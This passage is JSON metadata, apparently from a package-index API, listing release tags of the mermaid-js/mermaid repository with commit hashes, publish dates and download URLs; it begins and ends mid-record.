ynced_at":"2023-04-08T11:47:59.066Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/mermaid-js","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-14T05:34:15.747Z","updated_at":"2023-04-08T11:47:59.094Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js/repositories"},"tags":[{"name":"mermaid@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1/manifests"},{"name":"@mermaid-js/tiny@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1/manifests"},{"name":"v10.9.4","sha":"80dcf2eaad5b484ea41b5e0a8aee3fa8c5b99d34","kind":"commit","published_at":"2025-08-19T08:40:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4/manifests"},{"name":"mermaid@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.9","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9/manifests"},{"name":"@mermaid-js/tiny@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.2","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2/manifests"},{"name":"mermaid@11.9.0","sha":"767754f4fbfe22e74e0612c5d684e9b58c3c5caf","kind":"commit","published_at":"2025-07-16T08:25:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0/manifests"},{"name":"@mermaid-js/tiny@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1/manifests"},{"name":"@mermaid-js/parser@0.6.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1/manifests"},{"name":"mermaid@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1/manifests"},{"name":"@mermaid-js/tiny@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0/manifests"},{"name":"mermaid@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0/manifests"},{"name":"@mermaid-js/parser@0.6.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0/manifests"},{"name":"@mermaid-js/parser@0.5.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.8","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8/manifests"},{"name":"mermaid@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0/manifests"},{"name":"@mermaid-js/tiny@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.1","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1/manifests"},{"name":"@mermaid-js/parser@0.4.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0/manifests"},{"name":"mermaid@11.6.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0/manifests"},{"name":"mermaid@11.5.0","sha":"41a737f6821df4cdeab75643984912b82c1dff7a","kind":"tag","published_at":"2025-03-13T10:34:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.7","sha":"becadf0a7de509b6cc81e99a04abfa6cba8e7bfd","kind":"tag","published_at":"2024-11-27T17:15:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7/manifests"},{"name":"@mermaid-js/layout-elk@0.1.6","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6/manifests"},{"name":"mermaid@11.4.1","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1/manifests"},{"name":"mermaid@11.4.0","sha":"56f522ec50b5c746be5532686dd465a06215273d","kind":"tag","published_at":"2024-10-30T15:43:30.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0/manifests"},{"name":"v10.9.3","sha":"85ec96a72d06d45cf5d2b88af6ef0aca2d16c187","kind":"commit","published_at":"2024-10-22T08:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3/manifests"},{"name":"@mermaid-js/layout-elk@0.1.5","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5/manifests"},{"name":"mermaid@11.3.0","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0/manifests"},{"name":"v10.9.2","sha":"4dd4997c4d73784a239bac04deded9ff6866d2b4","kind":"commit","published_at":"2024-10-02T09:31:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2/manifests"},{"name":"mermaid@11.2.1","sha":"d63dc319c7c57a9900932fe4920be6a4e54570d5","kind":"tag","published_at":"2024-09-16T16:41:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1/manifests"},{"name":"@mermaid-js/layout-elk@0.1.4","sha":"9c41708d9e439f4cf82c0c954e6c40217f6754e4","kind":"tag","published_at":"2024-09-09T14:03:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4/manifests"},{"name":"mermaid@11.2.0","sha":"80903ec281db9053486f7dbfeae8430d2618e54d","kind":"tag","published_at":"2024-09-09T13:23:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0/manifests"},{"name":"mermaid@11.1.1","sha":"73147196b11e38bf825df17ca5f319aa54748b90","kind":"tag","published_at":"2024-09-06T17:19:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1/manifests"},{"name":"mermaid@11.1.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.3","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3/manifests"},{"name":"@mermaid-js/parser@0.3.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.2","sha":"95274278f39a31f00188935f3d7d1f0c3ccc607a","kind":"tag","published_at":"2024-08-24T07:21:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2/manifests"},{"name":"mermaid@11.0.2","sha":"158f9925cedd6e1a205635bd1b45e6d